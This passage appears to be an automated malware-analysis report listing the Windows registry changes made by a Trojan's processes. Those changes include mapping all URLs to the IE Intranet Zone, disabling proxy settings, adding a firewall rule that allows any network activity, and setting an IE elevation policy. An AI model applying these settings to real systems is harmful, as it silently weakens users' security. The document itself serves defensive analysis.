The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process xianfengkunbang.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 40 C0 11 D4 F1 F7 8B 5A 07 29 45 1C B6 47 3C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process MM-liao8863.exe:2808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao8863.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1437574637"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 2E F4 CB F3 7C 8A 2B C9 CF 9B 62 83 0D C7 05"
[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv088_63.exe" = "9158chat2_ktv088_63"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process BaiduP2PService.exe:252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB FA 69 4C C0 C7 50 A1 D7 27 0F B2 91 8C 1E AA"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppName" = "BaiduP2PService.exe"
"Policy" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppPath" = "%Program Files%\tools"
The process BaiduP2PService.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "QQPCDownload71960"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"MM-liao8863.exe" = "DownloadInstall Microsoft 基础类应用程序"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"install1393485.exe" = "install1393485"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 86 7E 81 D2 97 6E 60 45 C3 D1 35 EA 7E 52 3D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings so that all local web nodes with no dots, which do not refer to any zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
The process xianfeng.exe:272 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 11 AE 1D 91 1E 2A 9D 7D DA 54 76 F9 70 26 CE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process RsMgrSvc.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 53 FB AD 0B 3C D3 55 0E E3 15 E6 AA 3D ED 0A"
The process QQPCDownload71960.exe:2776 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D D8 20 E4 30 8C 29 EA ED 91 01 ED 69 00 98 F0"
Adds a rule to the Windows Firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe:*:Enabled:Tencent Download Program"
The process regsvr32.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 6F 6F 82 35 2B E6 B4 42 4C C9 1E F6 D5 B3 F6"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
The process regsvr32.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 27 00 09 3B BD 71 E4 0F BB D9 70 13 B6 83 45"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"
[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"
[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"
[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
The process regsvr32.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"
[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"
[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"
[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 47 06 DB 24 F6 FB 0E AB 15 D2 57 42 3D E2 D3"
[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"
The process regsvr32.exe:2480 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 F0 F9 DF 51 78 58 28 95 D9 6D 0E 0B C2 39 DE"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"
[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"
[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
The process install1393485.exe:1148 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcDll" = "1478494857"
[HKLM\SOFTWARE\rising\RAV]
"Name" = "Rising AntiVirus 2012"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"rstrayexe" = "gWx0Lv5HQEgHSwg0HF4LXHw="
"RAV" = "gWx0Lv5HYHol0A=="
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"InstallLocation" = "%Program Files%\Rising\RSD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"InstallPath" = "gWx0Lv5HF2shdi4fc3Y3cDtobmkaSgAjVWcheD8D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayVersion" = "23.00.01.03"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\rising\RAV\cfgUn\PreventUninstallSwitch]
"PreventUninstallSwitch" = "1"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcKind" = "5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcInfo" = "1446872457"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"Title" = "gWx0Lv5H-suj/tn/-pC71NWzoQ=="
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"UninstallString" = "%Program Files%\Rising\RSD\Setup.exe /UNINSTALL /PRODUCT=RSD"
"Publisher" = "Beijing Rising Information Technology, Inc."
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"ravmonexe" = "gWx0Lv5HQFoFVAYjVhUWQQwq"
